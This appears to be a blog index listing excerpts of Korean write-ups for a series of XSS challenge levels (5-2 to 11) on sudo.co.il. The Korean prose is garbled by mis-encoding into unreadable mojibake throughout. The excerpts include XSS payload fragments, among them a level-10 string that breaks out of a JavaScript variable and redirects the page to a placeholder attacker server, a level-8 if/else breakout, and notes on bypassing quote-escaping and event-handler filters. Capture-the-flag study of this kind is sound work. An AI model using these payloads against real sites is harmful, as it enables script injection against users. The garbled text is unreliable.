XSS Challenges 11

๋ ˆ๋ฒจ 11๋‹จ๊ณ„๋ฅผ ๋ณด์‹œ๋ฉด ๋น„๊ต์  ์‹ฌํ”Œํ•œ ํŽ˜์ด์ง€ ๊ตฌ์„ฑ์œผ๋กœ ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์šฐ์„  ์†Œ์Šค์ฝ”๋“œ ๋จผ์ € ๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ์ด๋ฒˆ์—๋Š” ๋‹ค์†Œ ๋ณต์žกํ•œ ์ฝ”๋“œ๋“ค๋กœ ๊ตฌ์„ฑ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. .php?p=์— ์ž…๋ ฅ๋œ Payload๋Š” "a"๋ผ๋Š” ๋ณ€์ˆ˜์— ๋‹ด๊ธฐ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. 11๋‹จ๊ณ„์—์„œ๋ถ€ํ„ฐ๋Š” ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ์ž…๋ ฅ ๊ฐ’ ์ด์™ธ์—๋Š” ๋ชจ๋‘ ์˜ˆ์™ธ์ฒ˜๋ฆฌ๋ฅผ ์ง„ํ–‰ํ•˜๊ณ  ์žˆ์–ด ๋ณ„๋„์˜ ๋ธ”๋ก ํ™”๋ฉด์ด ๋‚˜ํƒ€๋‚˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด๋ฌธ์ œ๋ฅผ ํ‘ธ์‹ ๋ถ„๋“ค์€ ์ € "Hacking attempt" ํ™”๋ฉด์„ ์ˆ˜์‹ญ ๋ฒˆ ๋ดค์„ ๊ฒƒ์ด๋ผ ์ƒ๊ฐํ•ฉ๋‹ˆ๋‹ค... ์ €๋Š” ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด ์—ฌ๋Ÿฌ ๊ธฐ๋ฒ•๋“ค์˜ Bofore After๋ฅผ ๋ถ„์„ํ–ˆ๋Š”๋ฐ ๋„์ €ํฌ ์‹คํ–‰๊ฐ€๋Šฅํ•œ ๊ตฌ๋ฌธ์„ ๋ชป ์ฐพ์•˜์Šต๋‹ˆ๋‹ค.. ํžŒํŠธ๋ผ๊ณ ๋Š” ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์ฑŒ๋ฆฐ์ง€๊ธฐ ๋•Œ๋ฌธ์— ํ•œ์ฐธ์„ ํ—ค๋งค๋‹ค๊ฐ€ security.stackexchange.com์—์„œ ์šฐ์—ฐํžˆ ํ•ด๊ฒฐ๋ฒ•์„ ํ™•์ธํ–ˆ์Šต๋‹ˆ๋‹ค. ๊ฒฐ๋ก ์ ์œผ๋กœ ..

CHALLENGE
XSS Challenges 10

level 10๋‹จ๊ณ„๋ฅผ ์ง„ํ–‰ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ํ‘œ๋ฉด์ƒ ๋ณด์ด๋Š” ํ™”๋ฉด์€ ์ด์ „๊ณผ ์œ ์‚ฌํ•œ ๋ชจ์Šต์„ ๋„์šฐ๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋‚ด๋ถ€ ์ฝ”๋“œ๋ฅผ ๋จผ์ € ์‚ดํŽด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. 10๋‹จ๊ณ„์—์„œ๋Š” a์™€ b๋ผ๋Š” ๋ณ€์ˆ˜์™€ ๊ฐ’์ด ์„ ์–ธ๋˜์–ด ์žˆ๋Š” ์ƒํƒœ์ž…๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๊ฐ€ ์ž…๋ ฅํ•  Payload๋Š” "a" ๋ณ€์ˆ˜์— ๋‹ด๊ธฐ๋„๋ก ๋˜์–ด์žˆ๋Š”๋ฐ document.write ์†์„ฑ์„ ํ†ตํ•ด ๊ฐ’์ด ์‹คํ–‰๋˜๋Š” ๊ฒƒ์„ ๋ณด์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. document.write()์˜ ๊ธฐ๋Šฅ์€ Document Object์˜ ํ•จ์ˆ˜๋กœ ์ธ์ˆ˜ ๊ฐ’์„ ์›น ๋ธŒ๋Ÿฌ์šฐ์ € ํ™”๋ฉด์— ํ…์ŠคํŠธ ํ˜•์‹์œผ๋กœ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ';{document.location.href="http://IP"}// 9๋‹จ๊ณ„์—์„œ ์ง„ํ–‰ํ•œ ๋ฐฉ๋ฒ•๋Œ€๋กœ a๋ณ€์ˆ˜๋ฅผ ๋‹ซ์•„ ๋งˆ๋ฌด๋ฆฌ(;)ํ•ด์ฃผ๊ณ  ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋ฅผ ๋กœ๋“œ์‹œ์ผœ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜๋„๋ก ํ•ด์ฃผ๋ฉด ๋  ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๋’ค..

CHALLENGE
XSS Challenges 9

ํ•œ๋™์•ˆ ์˜ฌ๋ฆฌ์ง€ ๋ชปํ–ˆ๋˜ XSS ์ฑŒ๋ฆฐ์ง€๋ฅผ ์˜ค๋žœ๋งŒ์— ๋‹ค์‹œ ํ’€๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ œ๊ฐ€ ์žฌ๋ฏธ์žˆ๊ฒŒ ํ’€๊ณ  ์žˆ๋Š” Alexander Korznikov์˜ XSS ์ฑŒ๋ฆฐ์ง€์˜ ์žฅ์ ์€ ๊ธฐ์กด์˜ XSS ๊ฒŒ์ž„๊ณผ๋Š” ๋‹ค๋ฅด๊ฒŒ ํŒŒํšŒ ๋ฒ•์„ ์˜ฌ๋ฆฐ ์‚ฌ๋žŒ๋“ค์ด ๋งŽ์ด ์—†์œผ๋ฉฐ(๊ตญ๋‚ด์—์„œ๋Š” ๋ณธ ์ ์ด ์—†๋„ค์š”..) ์ถœ์ œ์ž์˜ ์˜๋„๋ฅผ ์•Œ์•„์„œ ํŒŒ์•…ํ•˜๊ณ  ์ผ๋ง์˜ ํžŒํŠธ ์—†์ด ๊ณต๋žต ํ•œ๋‹ค๋Š” ์ ์—์„œ ๋”์šฑ ์• ์ฐฉ์ด ๊ฐ€๊ณ  ๋ชฐ์ž…์ด ๋˜๋Š” ๊ฑฐ ๊ฐ™์Šต๋‹ˆ๋‹ค. ๊ณต๋žต ํŽ˜์ด์ง€๋Š” ๊ต‰์žฅํžˆ ์‹ฌํ”Œํ•ฉ๋‹ˆ๋‹ค. Reflected ๋ฐฉ์‹์œผ๋กœ ํŒŒ๋ผ๋ฏธํ„ฐ์— ์ ์ ˆํ•œ Payload๊ฐ€ ์‚ฝ์ž…๋  ๊ฒฝ์šฐ ๋‹ค์ด์–ผ๋กœ๊ทธ ํŒ์—…์ฐฝ์„ ๋„์šฐ์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด์ „ ๋‹จ๊ณ„(8-1) ์˜ ์†Œ์Šค์™€ ์œ ์‚ฌํ•œ ํ˜•ํƒœ์˜ ์ฝ”๋“œ๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. b๋ผ๋Š” ๋ณ€์ˆ˜์—๋Š” "1"์ด ์„ ์–ธ๋˜์–ด ์žˆ๊ณ  if ์กฐ๊ฑด๋ฌธ์„ ํ†ตํ•ด ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋  ์ˆ˜ ์žˆ๋„๋ก ๊ตฌ๋ฌธ์„ ์™„์„ฑ์‹œ์ผœ์•ผ ๋ฉ๋‹ˆ๋‹ค. b์˜ ๋ณ€์ˆ˜..

CHALLENGE
XSS Challenges 8-1

์กฐ๊ฑด๋ฌธ์ด ์‚ฌ์šฉ๋œ 8 Level์„ ์ด์–ด์„œ 8-1 Level๊นŒ์ง€ ํ•œ๋ฒˆ ํ’€์–ด๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ๋งํฌ ํƒœ๊ทธ๋‚˜ ์ž…๋ ฅ์„ ๋ฐ›๋Š” ํผ์ด ๋”ฐ๋กœ ์กด์žฌํ•˜์ง€ ์•Š์œผ๋ฉฐ URL ํŒŒ๋ผ๋ฏธํ„ฐ์— ์ ๋‹นํ•œ ๋ฌธ์ž์—ด์„ ์‚ฝ์ž…ํ•˜๋„๋ก ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ๋ณด์‹œ๋ฉด 8 Level ์†Œ์Šค์™€ ์œ ์‚ฌํ•ด ๋ณด์ด์ง€๋งŒ ์กฐ๊ธˆ ๋‹ค๋ฅธ ํ˜•ํƒœ๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์Šคํฌ๋ฆฝํŠธ์ฝ”๋“œ๋Š” ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ์‹คํ–‰๋˜์ง€ ์•Š๊ณ  ์žˆ์œผ๋ฉฐ ์ด์œ ๋Š” ๋ฐ”๋กœ "์ค„ ๋ฐ”๊ฟˆ"์— ์žˆ์Šต๋‹ˆ๋‹ค. ์ด 2๊ณณ์˜ ์ค„๋ฐ”๊ฟˆ ์ฒ˜๋ฆฌ๊ฐ€ ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. if ( b == 2 ){a = "Your_Payload"} ๋นจ๊ฐ„์ƒ‰์œผ๋กœ ์ฒ˜๋ฆฌ๋œ ๋ถ€๋ถ„์˜์ค„ ๋ฐ”๊ฟˆ์œผ๋กœ ์ธํ•ด ์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์ด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋งˆ์ง€๋ง‰ ๋ฌธ๋‹จ๋ผ์ธ์€ " } " ๋‹ซํž˜์— ์ž˜ ๋งž๊ฒŒ ๋ฌธ์ž์—ด ์กฐ์ ˆ์„ ํ•˜๋ฉด ๋˜๊ฒ ์ง€๋งŒ ์ฒซ ๋ฒˆ์งธ " { " ์ค„ ๋ฐ”๋€œ์œผ๋กœ ์ธํ•ด else ์กฐ๊ฑด๋ฌธ์ด ์ œ๋Œ€๋กœ..

CHALLENGE
XSS Challenges 8

์ „๋‹จ ๊ณ„์™€๋Š” ๋‹ค๋ฅธ ๊ฒŒ ๋งํฌ ํƒœ๊ทธ ๊ธฐ๋Šฅ์ด ์‚ฌ์šฉ๋˜๊ณ  ์žˆ์ง€ ์•Š์€ ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ๋ณด๋ฉด์„œ ํ•œ๋ฒˆ ํ™•์ธํ•ด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. ์ „ ๋‹จ๊ณ„์—์„œ ์‚ฌ์šฉํ•œ ์ฝ”๋“œ๋ฅผ ์‚ฝ์ž…ํ•ด๋ณธ๊ฒฐ๊ณผ ๊ธฐ๋ณธ์ ์ธ ์‚ฝ์ž… ํ˜•ํƒœ๊ฐ€ ์•„๋‹Œ ๋…ผ๋ฆฌ ์—ฐ์‚ฐ์ž๊ฐ€ ์‚ฌ์šฉ๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณ ์ • ์†Œ์Šค๋กœ .. .. www.sudo.co.il/xss/level8.php?p=" }else{ " a์˜ ๋ณ€์ˆ˜์— "(๋”๋ธ” ์ฟผํ„ฐ)๋ฅผ ํ•˜๋‚˜๋งŒ ๋„ฃ์–ด a = "" ๋ณ€์ˆ˜๋ฅผ ๋งˆ๋ฌด๋ฆฌํ•ด์ฃผ๊ณ  " } "๋ฅผ ํ†ตํ•ด ๋‹ซ์•„์ฃผ๋ฉด ์ฐธ์ผ ๊ฒฝ์šฐ์˜ ์ฝ”๋“œ ์˜์—ญ์€ ๋์ด ๋‚˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. if์กฐ๊ฑด๋ฌธ์˜ ๊ฒฝ์šฐ else(๊ฑฐ์ง“) ๋˜๋Š” FALSE ๋„ ํ•จ๊ป˜ ์ถ”๊ฐ€ํ•ด์ฃผ๋ฉด b โ‰  2 ์ฆ‰ b ๊ฐ€ 2์™€ ๊ฐ™์ง€ ์•Š์„ ๋•Œ์˜ ๋ฌธ์žฅ์„ ์ฝ์–ด ๋“ค์ด๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.(b = 1 ์ด ๊ณ ์ •) ์ด์ œ ๊ธฐ๋ฐ˜์€ ๋‹ค์ ธ ๋†จ์œผ๋‹ˆ ํŒ์—…์ฐฝ์„ ์‹คํ–‰ํ•˜๊ธฐ๋งŒ ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ํ•˜์ง€๋งŒ ์œ„์—์„œ..

CHALLENGE
XSS Challenges 7

ํ•ด๋‹น ๋ฌธ์ œ์˜ ๊ฒฝ์šฐ hohoho๋ผ๋Š” ๋ฌธ์ž์—ด์„ ์ง€์ •ํ•ด๋‘๊ณ  ํด๋ฆญ ์‹œ ๋งํฌ ํƒœ๊ทธ( http://localhost/?๋กœ ๋„˜์–ด๊ฐ€๋„๋ก ๋กœ์ง์ด ๊ตฌ์„ฑ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ํ•ด๋‹น ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด์„  Your_Payload ์˜์—ญ์— ํŒ์—…์ฐฝ์„ ๋„์šธ ์ˆ˜ ์žˆ๋Š” ๋ฌธ์ž์—ด์„ ์‚ฝ์ž…ํ•ด์•ผ ๋ฉ๋‹ˆ๋‹ค. .. .. hohoho!!! .. .. ๋ช‡ ๋ฒˆ์˜ ์‹œ๋„๋ฅผ ํ•ด๋ณด๋ฉด์„œ ํ•„ํ„ฐ๋งํ•˜๊ณ  ์žˆ๋Š” ํŒจํ„ด์„ ๋จผ์ € ํ™•์ธํ•ด์•ผ ๋ฉ๋‹ˆ๋‹ค. ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ด๋ฒคํŠธ ํ•ธ๋“ค๋Ÿฌ์ธ "onmouseover"์˜ ๊ฒฝ์šฐ ๊ฐ€ ์‚ฝ์ž…๋˜์–ด์„œ ์‚ฌ์šฉ์„ ๊ธˆ์ง€์‹œํ‚ค๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ ํƒœ๊ทธ๊ฐ€ ์‚ฝ์ž…์‹œ --> ์ œ๊ฑฐ๋ฅผ ํ•˜๊ณ  ์žˆ์–ด์„œ ์•„๋ฌด๋ž˜๋„ localhost ๋ฌธ์ž์—ด์„ ์ด์–ด์„œ ์ž‘์„ฑํ•ด์•ผ ๋  ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค. *(ํด๋กœ์ง•) ๋“ฑ์„ ํ†ตํ•ด ๋ฌธ์žฅ์„ ๋งˆ๋ฌด๋ฆฌ๋งŒ ์ž˜ํ•ด์ฃผ๋ฉด ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜๋Š”๋ฐ ๋ฌธ์ œ๊ฐ€ ๋ฐœ์ƒํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. * onfocus : ์ˆ˜..

CHALLENGE
XSS Challenges 5-2

์ „๋‹จ ๊ณ„์™€ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ URL์— ์ž…๋ ฅ๊ฐ’์„ ๋ฐ›์•„ ํŒ์—…์ฐฝ์„ ๋„์šฐ๋„๋ก ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์–ด๋–ค ๊ฒ€์ฆ์„ ํ•˜๋Š”์ง€ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•ด ์ „ ๋‹จ๊ณ„์—์„œ์˜ ์ฝ”๋“œ๋ฅผ ์‚ฝ์ž…ํ•˜์—ฌ ํŽ˜์ด์ง€์˜ ์†Œ์Šค๋ฅผ ํ™•์ธํ•ด ๋ณธ ๊ฒฐ๊ณผ ์ด๋ฒˆ์—๋Š” '(์‹ฑ๊ธ€ ์ฟผํ„ฐ)๋ฅผ --> \' ํ˜•ํƒœ๋กœ ๋ฐฑ ์Šฌ๋ž˜์‹œ๋ฅผ ์ถ”๊ฐ€๋กœ ๋ถ™์—ฌ์„œ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ํ•ด๊ฒฐ ๋ฐฉ๋ฒ• 1. "(๋”๋ธ”์ฟผํ„ฐ) 2. \(๋ฐฑ์Šฌ๋ž˜์‹œ ํ™œ์šฉ) ์šฐ์„  ('guleum') --> (\'guleum\')๋กœ ์น˜ํ™˜๋˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— '(์‹ฑ๊ธ€์ฟผํ„ฐ) --> "(๋”๋ธ”์ฟผํ„ฐ)๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ์‚ฌ์šฉํ•ด์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋‹ค์Œ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ๋ณด์‹œ๋ฉด a ๋ณ€์ˆ˜์—๋Š” '(์‹ฑ๊ธ€ ์ฟผํ„ฐ)๊ฐ€ ๊ธฐ๋ณธ์ ์œผ๋กœ ํ•˜๋‚˜๊ฐ€ ๋ถ™์–ด์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๋‹ซ์„ ๋•Œ๋„ '(์‹ฑ๊ธ€ ์ฟผํ„ฐ)๋ฅผ ์‚ฌ์šฉํ•ด์„œ ๋ฌถ์–ด์ค˜์•ผ ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿด ๋•Œ๋Š” \(๋ฐฑ ์Šฌ๋ž˜์‹œ)๋ฅผ '\' ์‹ฑ๊ธ€ ์ฟผํ„ฐ๋กœ ๋ฌถ์–ด์ฃผ๋ฉด \(๋ฐฑ์Šฌ๋ž˜์‹œ)์— ์˜ํ•ด ..

CHALLENGE